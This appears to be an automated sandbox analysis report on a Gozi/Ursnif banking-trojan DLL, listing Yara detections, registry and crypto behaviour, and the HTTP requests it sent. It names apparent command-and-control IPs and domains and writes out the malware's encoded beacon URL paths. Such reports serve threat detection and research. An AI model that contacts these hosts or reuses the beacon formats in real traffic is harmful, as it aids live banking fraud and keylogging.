    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: unknownTCP traffic detected without corresponding DNS query: 31.207.46.124
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSazt
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZ
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/jerry/aSMHh5W2R09y97_/2BTh3L56RxwrH5JH4F/CB8VvX3np/o6NOLngWb2K_2FSc_2BM
    Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
    Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
    Source: powershell.exe, 00000011.00000002.882964274.000002EFAB757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
    Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://internetcoca.in/
    Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://internetcoca.in/a
    Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398416154.0000000001086000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l
    Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://meganetwork.top/
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJ
    Source: powershell.exe, 00000011.00000002.884674469.000002EFAB931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://supernetwork.top/
    Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://supernetwork.top/%
    Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://supernetwork.top/E
    Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/Z
    Source: unknownDNS traffic detected: queries for: meganetwork.top
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D466D ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
    Source: global trafficHTTP traffic detected: GET /jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJNuMH/RpW6bg0QRvZX/QXfPDGL10GT/SdaapIAklDbfEO/Uj_2BAmamwU2u8BHod3aP/PgD0dTDTJEMSc0UK/j1e9AdZnRhxmLd2/iyZSWXfqsPP5Mz2_2F/RxfeMhVZi/snsYr1rBTn9DbB3n1htJ/THaNUdrjEpMaPV5FZB0/hnSI3F95hi8RSrq2PqAvJg/NhyoyNMSlw300/RuRhnMAi/yuKjfRG8BZDb0ZtEsV/Y0c.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: meganetwork.topConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/ZLc8q9AvlDxusKBXZEkxW/7UMIMirPk3DmAiEd/MIUggpPiQ7ixyfB/FE8tNplPzMQkKS2ZFu/JXFIU12Aw/jv5mVYFsQ20lg4INnqbs/F8R3I0LYx88osTnvgV0/etG2XQldFgo6x4JgYsuQNF/j4JQ96Ft17Rz7/eCxN97dQ/rJhcjYfddaM8eJW_2Fean2z/A92cM0Ky22/lOBKLw85du6YHY_2B/3g2GAbm.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: supernetwork.topConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/lHo21jXWhX39Xk5R4R/_2F_2FyAz/YZ8oYHuNhYCmHdf0wSbR/salWQlnNDBjP7A66JVO/sppCnKDjVH3lbE5G7LF5U7/5LSg_2BcZCu_2/F5_2FR_2/B6AH2Mv27ibqMLrY4km_2Fx/gY8_2FL6Mv/5k_2BKapoEIZ8reVa/lFw7CKKCr00_/2FffYJ4qZ35/6uQ8_2B3xnzdTZ/FQ3TIcDZlZ_2BmcKyHZ4r/5C6qwwmwbcuALm_2/BEPFExtOhb_2B6k/D_2FhWFqp3TtB_2BN/1vytrT.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: internetcoca.inConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZs5LHn1/1_2BHT6MZAolHFOS/6QcVb6Sy1jmNhbf/GYszPrGfJFenuaRQz6/_2BhFQScX/2I2_2FVeVKW5cCoy7gT4/8KYwuw3rx60555o08Kn/opCh843XnHy29nfuXF6b2z/huTk_2FUjzUDI/ISxuKPlx/DZKqk4ugdLqCYc3dzjZ_2Br/21q0mwi2jT/PIT_2FnEyJ3MqtVh6/qexCz0xFpyCT/BYpr5_2B38q/mb5tW8uXYlLBsL/HRJTV7U9DpT/Lb.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSaztxByX/Gj2CVVFo49mQFm/C9zaruRo3JRcHrjSr91x3/QFYBC_2FsxN_2B7X/uufaTAjpOm99699/Pq_2FSETrsZSqN9Ojz/3qeuXW2xr/R0a72t7BsPAzZ_2BbGig/RJ4QPZizbCIE_2Fbc3V/bnU9fiqNJ0ptmBxGj2iZqV/2_2BtpYpuaB39/FW0ST0qr/ePsn6GFPOwexxSy3EgaplHS/uHjfw_2BI_/2BU_2B8F8OF00pKIM/YJkKjo7czRDc/E_2BThKsX/cG_2Fr.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv_2Ft/Q5KyRgYr/iv5NSA792h1xHcDS5L6fsEG/6f6Mo_2Fxe/zRCCWBAwTeLJqLbV9/kqNgWULptALz/6SvcsPi5EHX/ePWs4WCPyL8a8x/7zSS0_2F0FPHafzsv8Nrj/_2FvbJqIrbuIliTu/28Zs8gl0EBncgLE/E0Xb7wwqBhrlCP2lDF/LuKqKVbSw/I0P0F2TMmM1CY00Wt6n5/Qvz8fbopIWFtWKI6Q1E/CrYECeKd/SC2ahZciZ/j0v83.bob HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.207.46.124Connection: Keep-AliveCache-Control: no-cache

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
    Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D52F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

    System Summary

    barindex
    Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: 7078612.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
